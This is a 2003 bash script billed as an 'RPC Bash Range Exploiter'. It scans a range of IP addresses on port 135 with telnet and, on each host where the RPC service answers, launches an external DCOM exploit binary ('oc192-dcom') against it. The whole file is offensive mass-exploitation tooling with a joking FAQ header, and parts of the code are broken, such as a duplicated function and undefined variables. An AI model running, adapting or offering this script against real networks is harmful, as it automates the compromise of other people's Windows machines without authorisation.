#!/bin/bash # Under GPL ver 2.0 and above # Greats to all dumb asses, hackers crackers suckers:] and # All the living Lifeforms that knows me # Special 10xz to: # STRASHARO , HellPain , Pro-XeX(necroleak) , Indjeto # SIC-a , dr0p , ORDER , static , Adrenalinche, krassswr # and all other shits mensioned above # # Special Big Thanx to ORDER who was tester of that shit. # # FAST FAQ: # Q: What The Hell About ... shall I Use This Shit?? # A: This gets or tries to get a banner from a remote machine # Running Some kind of httpd, on a range of machines, that # would possibly run web servers. # # Q: Are You Nuts Man?? # A: Quite a lot.:] # # Q: You are stupid! # A: Yeah I know:] # # Q: Can I use this stuff for some other checks of daemon banners? # A: Yes You can. Simply change the $wrong below. # E: wrong='GET HEAD / HTTP/1.0\n\n\n\n' change the string to the one needed # to grep the service banner. # # Q:What exactly this stuff does. # A:It asks the httpd for banner. # So most of the httpds return error and # their httpd banner. # # # Q:What Music do you like? # A: metal, punk, rock, gothic, industrial, trance # # # ## This is dedicated to my-exgirlfriend whom ircnickname is fdsg # Sorry About the raw source but i don't have time to make # it look good. # # If errors occured mail to: hipodilski@openvms-rocks.com # visit -===www.pc-freak.org===- -- Enjoy The Anti M$ Stuff # string to send to the service exploit_cmd='./oc192-dcom'; # default port value def_port='135'; # head value head_num='10'; # time to sleep w8 for connection time='0'; # logs dir log_dir="`echo $HOME`/rpc-log"; # Print Messages service='RPC'; # Filebase name for logfiles service_log_name='rpc-log'; # Some func needed vars string1=$1; string2=$2; string3=$3; # Little check to see shall we use our default port or not. if [ -n "$2" ] && [ "$2" != "-v" ]; then def_port="$2"; fi # Cuts Entered String as $1 so we get the octets we need ... octet_stuff() { ## whole entered string A=$string1; # D ## 4th ip octet A4=${A/*./}; C=${A/.$A4/}; # A ## 1st ip octet A1=${A/.*/}; E=${A/$A1./}; # B ## 2nd ip octet A2=${E/.*/}; # C ## 3rd ip octet A3=${C/*./}; ## start range num A5=${A4/-*/}; E1=${E/-*/}; ## end range num A6=${A4/*-/}; if [ -z "$A6" ]; then help_banner; exit 0; fi } # check for log dir existence else creates one. dir_check() { if test -d $log_dir; then cat /dev/null else mkdir $log_dir; fi } # Checks is the entered ip ip correct ipv4 adress. check_ip_true() { ip_border='255'; if [ -z $string1 ]; then help_banner; else if [ "$A1" -gt "$ip_border" ] || [ "$A2" -gt "$ip_border" ] || [ "$A3" -gt "$ip_border" ] || [ "$A5" -gt "$ip_border" ]; then echo -n "Invalid IP"; echo "Some IP Octet exceeds possible borders from 0 to 255!."; exit 0; else cat /dev/null fi fi } # Help Function help_banner() { echo "$service Bash Range Exploiter by (hipo) from pC-fREAK Org."; echo "Modified from Bash Range Scanner httpcheck.sh"; echo '------------------------=Help=-----------------------'; echo '[syntax]:'; echo "`basename $0` [ip-range] [port] :"; echo 'port defaults to 135'; echo "Example:"; echo "`basename $0` 127.0.0.1-255 135; `basename $0` 127.0.0.1-1 80 -v;"; echo 'This Example Will try to expl. the range 127.0.0.1-255 and host 127.0.0.1'; echo "If bugs occured mail me at : hipodilski@openvms-rocks.com"; echo '------------------------------------------------------'; echo 'Enjoy.!:]'; exit 0; } # Check For Params and decides which scan func. to invoke check_params() { if [ -z "$string1" ]; then help_banner; exit 1; elif [ -n "$string1" ] && [ -z "$string2" ]; then do_scan; elif [ -n "$string1" ] && [ -n "$string2" ] && [ "$string2" != "-v" ] && [ -z "$string3" ]; then do_scan1; elif [ -n "$string1" ] && [ "$string2" == "-v" ]; then do_scan2; elif [ -n "$string1" ] && [ -n "$string2" ] && [ "$string3" == "-v" ]; then do_scan2; else echo "Error You have messed something. "; exit 1 fi } # Scan function Num:0 do_scan() { touch $log_dir/$service_log_name-$C.$i; for i in `seq $A5 $A6`; do #host_count='1'; #help_val='1'; #host_count=$(( $host_count + $help_val )); ((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \ &> $log_dir/$service_log_name-$C.$i; ) &>/dev/null echo -e "$service on $C.$i Scanned."; echo "*------------------------------------------*"; done } # Scan function Num:1 do_scan1() { touch $log_dir/$service_log_name-$C.$i; for i in `seq $A5 $A6`; do ((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \ &> $log_dir/$service_log_name-"$C.$i";) &> /dev/null; echo -e "$service on $C.$i Scanned."; echo "*------------------------------------------*"; done } # Scan function Num:2 do_scan2() { echo "Verbose Mode On:"; touch $log_dir/$service_log_name-$C.$i; for i in `seq $A5 $A6`; do ((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \ &> $log_dir/$service_log_name-"$C.$i";) &> /dev/null echo '*------------------*'; wait cur_log_state=`cat $log_dir/$service_log_name-"$C.$i" | wc -l | awk '{ print $1 }'`; if [ "$cur_log_state" == 1 ]; then echo "$service Running."; echo "Trying to exploit $C.$i."; exploit_fn; elif [ "$cur_log_state" == 2 ]; then echo "port $def_port on $C.$i is filtered or host is down ..."; else cat "$log_dir"/$service_log_name-"$C.$i"; fi done } # It is supposed to be 3d Scan func but actually :} # Maybe bash is buggy and this is simple workaround. do_scan2() { echo "Verbose Mode On:"; touch $log_dir/$service_log_name-$C.$i; for i in `seq $A5 $A6`; do ((sleep $time; killall -9 $exploit_cmd) | telnet "$C.$i" $def_port \ &> $log_dir/$service_log_name-"$C.$i";) &> /dev/null echo '*------------------*'; wait cur_log_state=`cat $log_dir/$service_log_name-"$C.$i" | wc -l | awk '{ print $1 }'`; if [ "$cur_log_state" == 1 ]; then echo "$C.$i $service service is Running."; echo "Trying to exploit $C.$i."; exploit_fn; elif [ "$cur_log_state" == 2 ]; then echo "port $def_port on $C.$i is filtered or host is down ..."; else cat "$log_dir"/$service_log_name-"$C.$i"; fi done } last () { echo -e "\nScan on $A Completed.\n\n "; } exploit_fn () { $exploit_cmd -d $C.$i -t $type; } # Main Function Inokes all the stuff main1 () { octet_stuff; check_ip_true; dir_check; check_params; last; } main1; # Release date # Oct. 12 04:25:02 EEST 2003